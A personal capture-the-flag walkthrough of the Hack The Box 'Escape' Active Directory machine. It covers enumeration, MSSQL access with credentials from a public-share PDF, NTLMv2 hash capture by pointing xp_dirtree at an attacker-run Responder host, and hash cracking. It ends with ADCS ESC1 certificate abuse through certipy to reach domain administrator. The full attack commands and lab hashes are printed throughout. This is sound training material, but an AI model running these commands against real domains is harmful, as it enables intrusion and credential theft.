Enumeration
I ran my favorite nmap commands on the provided IP.
nmap scan results
Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.55% done
Nmap scan report for 10.129.19.47
Host is up (0.028s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-06 22:57:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2026-04-06T22:59:14+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-06T22:59:13+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2026-04-06T22:59:14+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-04-06T22:55:27
|_Not valid after: 2056-04-06T22:55:27
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2026-04-06T22:59:14+00:00; +8h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-06T22:59:13+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-04-06T22:58:34
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.48 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-06 16:59 CEST
Nmap scan report for 10.129.19.47
Host is up (0.029s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49711/tcp open unknown
49720/tcp open unknown
49741/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 105.05 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-06 17:01 CEST
Nmap scan report for 10.129.19.47
Host is up (0.029s latency).
Not shown: 996 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
We can see a number of Active Directory related ports opened. From the output I see the domain name and DC name as well - sequel.htb & dc.sequel.htb. I will add them to /etc/hosts and start from enumerating DNS.
DNS
For enumerating DNS I like to run a number of dig commands.
I like to first start by enumerating the name server dig @sequel.htb dc.sequel.htb NS.
dig @sequel.htb dc.sequel.htb SOA for basic information about the domain.
The mail server dig @sequel.htb dc.sequel.htb MX
I also like to check TXT and ALL for some left over data.
And at the end I like to test for a zone transfer with dig @sequel.htb dc.sequel.htb SOA.
I also try to enumerate all domains and subdomains to make sure that I don’t miss anything. dig’s output is pretty messy, but It’s good to practice working with it.
SMB
I found no new data with DNS, let’s look for some easy data with null SMB access. Unfortunately there isn’t an anonymous access to it. I also run sudo ntpdate sequel.htb just to make user it’s not because of the time skew.
Seeing as the domain is named “sequel” maybe there is “prequel” or other subdomains in general. I will check in a second, I want to enumerate users on the domain. It can be done with netexec smb 10.129.19.47 -u 'guest' -p '' -rid-brute but it looks like the guest account is disabled.
PS: It was enabled, maybe uppercase would help or there was some setting that didn’t allow it to work. Admittedly, I didn’t look deeply into that.
Background scanning
For subdomains, I would usually run something like ffuf -u sequel.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/ -H "Host: FUZZ.sequel.htb" in the background, but ffuf requires HTTP and a web server for this to work so it won’t fly. gobuster dns -d sequel.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt on the other hand, queries DNS directly. It’s slower but it does the job.
Background subdomain bruteforce found no new domains.
LDAP
I can check if I can scoop some data with some anonymous ldapsearch queries. I ran ldapsearch -x -H ldap://10.129.19.47 -b "DC=sequel,DC=htb" but it looks like LDAP requires credentials to correctly bind and server me info. RPC similarly denies me entry when I try a null session - rpcclient -U -N 10.129.19.47.
Interesting how little information I found, I actually double-checked my connection to make sure all is working well. From interesting services on opened ports I didn’t yet check MSSQL out. But I don’t think there is any anonymous or null authentication for it. Funny how the box name is “Escape” but I can’t “Enter” it so far. Wsman and ADWS are similar, they require authentication and creds to be useful.
Foothold
I went back on my steps and noticed that I imputed the smbclient flags incorrectly. Previously I ran smbclient -L -N //10.129.228.253/ but the correct placement is smbclient -N -L //10.129.228.253/.
With smbmap -H 10.129.228.253 -u 'anonymous' -p '' I can see that the only readable shares for me are now IPC and Public. In the Public share we can find a “SQL Server Procedures.pdf” file with I downloaded to my host. I can’t run ls inside IPC so It seems I have insufficient permissions to properly enumerate it. The pdf holds information about previous incidents in the company related to insecure practices with their SQL servers at their company. From the pdf we got a step-by-step guide how to access the database, command to do so, basic credentials and a number of users mentioned. Also an email so we know the naming structure if it will come to some sort of bruteforcing.
Users:
Ryan
Tom
Brandon (Brandon.Brown@sequel.com)Credentials: PublicUser:GuestUserCantWrite1
The guide mentions to use cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<username>" /pass:<password> however this is a windows command. I’m fairly certain that I can just plug them into mssqlclient.py from impacket. impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.129.228.253.
MSSQL
I managed to authenticate to the SQL Server. I checked what databases are there with:
SQL (PublicUser guest@master)> SELECT name FROM sys.databases;
name
------
master
tempdb
model
msdb Later, I enumerated the MSSQL with these basic commands:
- Use a database -
USE master - Show tables -
SELECT name FROM master.dbo.sysdatabases - Access data in tables -
SELECT table_name FROM master.INFORMATION_SCHEMA.TABLES
But I didn’t find anything useful. I went through my other notes and tried to use XP_CMDSHELL, read files and impersonate other users that I found before but all didn’t lead to any privilege escalation.
I searched further and with SELECT srvname, isremote FROM sysservers I found out that there is another SQL server. Judging by the context, this is the original DC Mockup. Sadly EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [DC\SQLMOCK] shows that my current user has insufficient permissions to query it.
As there is no one I can impersonate and my user has lacking permissions I will look for some password reuse. I checked with netexec what PublicUser can do. It showed that it could query LDAP but after trying it out with ldapsearch It seems that even tho it can correctly authenticate, it’s being denied the permission to do so.
Looking though my other notes for MSSQL I found that there is a way to catch an MSSQL’s NTLMv2 hash with responder so I tried that. I ran responder -i tun0 and then in MSSQL EXEC master..xp_dirtree '\\10.10.15.189\random' to trick it into authenticating to my host. This worked and I caught the hash.
Loot:
[SMB] NTLMv2-SSP Client : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:2d7a260b829dfd6c:20DBD9BB0FAD204C34040A771E96C595:0101000000000000808D60B351C7DC01C44CDB13A2F20E1600000000020008004B004E005400310001001E00570049004E002D00390033003200570036004B004600550050003900360004003400570049004E002D00390033003200570036004B00460055005000390036002E004B004E00540031002E004C004F00430041004C00030014004B004E00540031002E004C004F00430041004C00050014004B004E00540031002E004C004F00430041004C0007000800808D60B351C7DC0106000400020000000800300030000000000000000000000000300000B3C49F6D23AD7F502D71A2E45F21AB5A0C4CE49C19953B329BBA1A333BE0E0F20A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E003100380039000000000000000000I copied the NTLMv2 hash into a file and ran it against rockyou with hashcat sql_svc.hash /usr/share/wordlists/rockyou.txt.
With that, I cracked it - sql_svc:REGGIE1234ronnie
Privilege Escalation
Now as a sql_svc I want to check what I can authenticate to. I grew a bit tired to running a few separate netexec commands so I created a simple loop for that:
for p in smb winrm mssql; do netexec $p 10.129.228.253 -u ''sql_svc -p 'REGGIE1234ronnie'; done
PS: I actually created a small bash script for this, you can find it here :)
I noticed that - interestingly - sql_svc has access to winrm which I didn’t expect. I used evil-winrm and successfully authenticated into the host. I started to manually enumerate the user’s files but I didn’t find anything useful there, no creds, not user flag and nothing of note in AppData. I enumerated the user’s one the host.
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svcGoing down into the root directory I saw the “SQLServer” folder and entered it. I looked around and downloaded any log, config or generally interesting files into my localhost so I can go through them in search of any leaks, mentioned vulnerabilities, custom scripts or software versions.
One of those files was ERRORLOG.BAK which after further inspection shows that the user Ryan.Cooper tried but failed to authenticate into the SQL server.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
Amid this data we can see that the user - likely by accident - inputted their password in clear-text as a username - Ryan.Cooper:NuclearMosquito3
Similarly to sql_svc i ran netexec and looked what I can access with the new user. Seeing that I could access the host via winrm I did just that. Looking at the user’s files I found the user flag on the Desktop, and begun to look for further privilege escalation vectors. I enumerated the AppData folder, looked for custom scripts, ran whoami /all and generally did a basic lookup of what I could do as the user.
WinPEAS
Not finding any low-hanging fruit, I decided to download and run WinPEAS as well as enumerate the domain with bloodhound-python and rusthound.
Below are some interesting parts of WinPEAS output which I decided to note.
Promising winPEAS output
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Named Pipes
Name CurrentUserPerms Sddl
eventlog Everyone [Allow: WriteData/CreateFiles] O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
MSSQL$SQLMOCK\sql\query Everyone [Allow: WriteData/CreateFiles] O:S-1-5-21-4078382237-1492182817-2568127209-1106G:DUD:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-4078382237-1492182817-2568127209-1106)
ROUTER Everyone [Allow: WriteData/CreateFiles] O:SYG:SYD:P(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;SY)
RpcProxy\49689 Everyone [Allow: WriteData/CreateFiles] O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)
RpcProxy\593 Everyone [Allow: WriteData/CreateFiles] O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)
SQLLocal\SQLMOCK Everyone [Allow: WriteData/CreateFiles] O:S-1-5-21-4078382237-1492182817-2568127209-1106G:DUD:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-4078382237-1492182817-2568127209-1106)
vgauth-service Everyone [Allow: WriteData/CreateFiles] O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
---
MinPasswordLength: 7
---
ÉÍÍÍÍÍÍÍÍÍ͹ Autorun Applications
È Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
Folder: C:\Users\Ryan.Cooper\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
FolderPerms: Ryan.Cooper [Allow: AllAccess]
File: C:\Users\Ryan.Cooper\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected) - C:\Users\Ryan.Cooper\AppData\Roaming\Microsoft\Windows
FilePerms: Ryan.Cooper [Allow: AllAccess]
Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
---
If you can modify a template (WriteDacl/WriteOwner/GenericAll), you can abuse ESC4
Dangerous rights over template: User (Rights: WriteProperty,ExtendedRight)
Dangerous rights over template: UserSignature (Rights: WriteProperty,ExtendedRight)
Dangerous rights over template: ClientAuth (Rights: WriteProperty,ExtendedRight)
Dangerous rights over template: EFS (Rights: WriteProperty,ExtendedRight)
Dangerous rights over template: UserAuthentication (Rights: WriteProperty,ExtendedRight)
[*] Tip: Abuse with tools like Certipy (template write -> ESC1 -> enroll).
- The named pipes seen above sounded as a possible priv-esc but from what I gathered if there is no impersonation, SYSTEM/Administrator or “Full Control” permissions then It likely won’t do much.
- I noted that the minimal password length was 7 characters in case of a need to bruteforce.
- I noticed an interesting potentially sensitive file mentioned in an autorun application but similarly to the named pipes, it didn’t mention any highly privileged users so it would likely not help much.
- The last part I noted was information about dangerous rights over a few templates (so ADCS) which could be interesting. I had some experience with those and I have a bad habit of forgetting to enumerate this vector with
certipy.
I kept a mental note of the aforementioned vectors and judging by my gut feeling of how successful they might be I decided to focus on the ADCS path of attack.
bloodhound-python & rusthound
Before I did anything tho, I wanted to still look what bloodhound can show me, as I could’ve very easily miss some group rights or permissions. Also, it’s easy to get data from bloodhound and It will come in handy when creating certipy commands.
I run by bloodhound command with bloodhound-python -u Ryan.Cooper -p 'NuclearMosquito3' -d sequel.htb -dc dc.sequel.htb -ns 10.129.228.253 -c all; rusthound-ce -d sequel.htb -u Ryan.Cooper -p 'NuclearMosquito3' --zip -c All --ldaps getting both general data from bloodhound-python and some additional certificate data that rusthound covers and begun to enumerate.
Certipy - ESC1
Admittedly, I didn’t find anything really useful, no additional paths of escalation. Because of that I decided to go with certipy.
I scanned Ryan’s permissions on certificates with certipy find -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -target-ip 10.129.228.253 -vulnerable -stdout and from the output I noticed that Ryan.Cooper seems to be vulnerable to ESC1. After double-checking with my notes from Authority, he seems to check all the required boxes for this to work.
Said requirements are:
- Enrollee Supplies Subject = True
- Client Authentication = True (or a few others)
- “User Enrollable Principals” showing a group your user is a part of
- Requires Manager Approval = False
- Authorized Signatures Required = 0
So, I begun to stitch together a certipy command. I ran -debug a few times as I never manage to run it correctly on the first try and came back with this one:
certipy req -u 'Ryan.Cooper@sequel.htb' -p 'NuclearMosquito3' -dc-ip '10.129.228.253' -target 'dc.sequel.htb' -ca 'sequel-DC-CA' -template 'UserAuthentication' -upn 'administrator@sequel.htb' -sid 'S-1-5-21-4078382237-1492182817-2568127209-1105' -dc-host dc.sequel.htb -target-ip 10.129.228.253.
Small rant: My god is certipy’s syntax annoying to follow. It feels like I need to repeat the same thing three times in one command.
Anyway, I got the administrator.pfx file which is a bundle of a certificate and a private key. I used it to authenticate as an administrator so that I could get a TGT and an NTML hash - certipy auth -pfx administrator.pfx -dc-ip 10.129.228.253. I also had to fix my time skew so I ran sudo ntpdate 10.129.228.253 and below is the loot:
Loot:
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4eeWith this information the box is really solved. Now I just had to pick a way and a tool to authenticate as an administrator. I decided to use Kerberos as I’m a bit less familiar with it than NTLM.
I checked if I had any other kerberos tickets saved up in my cache as a good practice:
azaeir@parrot (~): echo $KRB5CCNAME
azaeir@parrot (~): klist
klist: No credentials cache found (filename: /tmp/krb5cc_1000)Seeing as there isn’t anything there, I added the administrator.ccache that I obtained into my KRB5CCNAME environment variable:
azaeir@parrot (~): export KRB5CCNAME=administrator.ccache
azaeir@parrot (~): echo $KRB5CCNAME
administrator.ccacheAnd authenticated to the host with psexec.py -k -no-pass sequel.htb/administrator@dc.sequel.htb. I found the root flag on the Admin’s desktop.
Closing Thoughts
Escape is a great machine covering basic network enumeration, intermediate knowledge about MSSQL attack vectors and escalation with ADCS. It doesn’t show any niche techniques or obscure vulnerabilities but provides some great fundamental challenges with a seamless and intuitive attack path.
It was a good box to sharpen some core elements a pentester’s methodology, little to know curve-balls which I do appreciate.